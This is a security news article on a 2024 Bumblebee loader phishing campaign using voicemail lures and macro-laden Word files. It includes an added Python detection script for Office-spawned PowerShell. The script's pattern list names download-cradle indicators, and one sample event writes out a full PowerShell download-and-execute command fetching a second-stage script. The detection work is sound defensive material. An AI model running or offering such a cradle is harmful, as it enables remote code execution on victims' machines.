The Bumblebee malware, known for its role as a loader and initial access broker, has reappeared in a new phishing campaign targeting U.S. businesses. The campaign, observed in February 2024, utilizes voicemail-themed lures containing links to OneDrive URLs.
According to an enterprise security firm, the URLs lead to Word files that spoof the consumer electronics company Humane. These files leverage VBA macros to execute a PowerShell command, which in turn downloads and runs a second PowerShell script from a remote server to install the Bumblebee loader.
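The chain described above (Office document, VBA macro, PowerShell, remote script) leaves a recognizable trace in endpoint process telemetry: an Office application as the parent of PowerShell, with a download cradle on the command line. The following is an added detection example written for this article, not code from the article or from any vendor report; the Sysmon-style record layout, the field names and every sample event are constructed for illustration.

```python
"""Flag Office -> PowerShell process creations, escalating when the command
line carries download-cradle indicators.

Added example, not from the article or any vendor report. Record layout and
all sample events below are constructed; the paths and URL are not real IoCs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Office binaries a macro-enabled lure would typically be opened in.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a PowerShell download cradle or of hiding
# the console window from the user; matched case-insensitively.
CRADLE_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"downloadstring", r"downloadfile", r"net\.webclient",
        r"invoke-webrequest", r"\biwr\b", r"\birm\b", r"invoke-restmethod",
        r"\biex\b", r"invoke-expression",
        r"-e(nc|ncodedcommand)?\s", r"-w(indowstyle)?\s+hidden",
        r"https?://",
    )
]


@dataclass
class ProcessEvent:
    """One process-creation record (constructed, Sysmon Event ID 1 style)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> tuple[str, list[str]]:
    """Return (severity, matched_indicator_patterns) for one event.

    severity is "none" (not Office -> PowerShell), "suspicious" (Office spawned
    PowerShell with no cradle indicators) or "high" (indicators present).
    """
    if _basename(event.parent_image) not in OFFICE_PARENTS:
        return "none", []
    if _basename(event.image) not in POWERSHELL_IMAGES:
        return "none", []
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(event.command_line)]
    return ("high" if hits else "suspicious"), hits


def scan(events: Iterable[ProcessEvent]) -> list[tuple[str, str]]:
    """Return (severity, command_line) for every event that is not benign."""
    return [(sev, e.command_line) for e in events
            if (sev := classify(e)[0]) != "none"]


# Constructed sample telemetry: one cradle, one benign admin script, one
# Office-spawned PowerShell without indicators, one unrelated Office child.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "IEX (New-Object Net.WebClient)'
                 ".DownloadString('http://example.invalid/stage2.ps1')\""),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\splwow64.exe",
                 "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for severity, cmd in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {cmd}")
```

The two-tier result matters in practice: Office spawning PowerShell at all is rare enough on most fleets to deserve a ticket, while the cradle indicators (hidden window, `IEX`, `DownloadString`, a URL) justify immediate isolation of the host. Pairing the rule with the macro-blocking policy discussed below removes the benign noise that macro-heavy finance teams would otherwise generate.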
First detected in March 2022, Bumblebee is used to download and execute follow-on payloads, such as ransomware. It has been associated with crimeware threat actors known for distributing BazaLoader (aka BazarLoader) and IcedID.
Bumblebee is believed to be developed by threat actors linked to the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In a previous campaign disclosed in September 2023, the malware was distributed using Web Distributed Authoring and Versioning (WebDAV) servers.
The recent attack chain stands out for its use of macro-enabled documents, especially since Microsoft has blocked macros by default in Office files downloaded from the internet since July 2022. This marks a shift from previous campaigns, which relied on other methods to install the loader, such as zipped LNK files or HTML attachments exploiting WinRAR flaws.
The resurgence of Bumblebee coincides with new variants of QakBot, ZLoader, and PikaBot. QakBot, distributed in the form of Microsoft Software Installer (MSI) files, has introduced improvements in encryption and the ability to detect virtual environments, making analysis more challenging.
Despite efforts to dismantle QakBot’s infrastructure in late August 2023, new variants have emerged, suggesting that threat actors with access to the original source code are experimenting with new builds. QakBot has also become the second most prevalent malware as of January 2024, highlighting its continued threat.
In a separate development, phishing sites mimicking financial institutions have been used to trick users into downloading remote desktop software, allowing threat actors to gain control of their machines. This underscores the evolving tactics used by cybercriminals to target businesses and individuals.
Enhance your defenses against the Bumblebee malware by educating your employees about phishing attacks and encouraging them to report suspicious emails. Use endpoint protection and threat intelligence tools to detect and respond to malware threats effectively. Organizations should also conduct regular security assessments and audits to identify and mitigate potential vulnerabilities.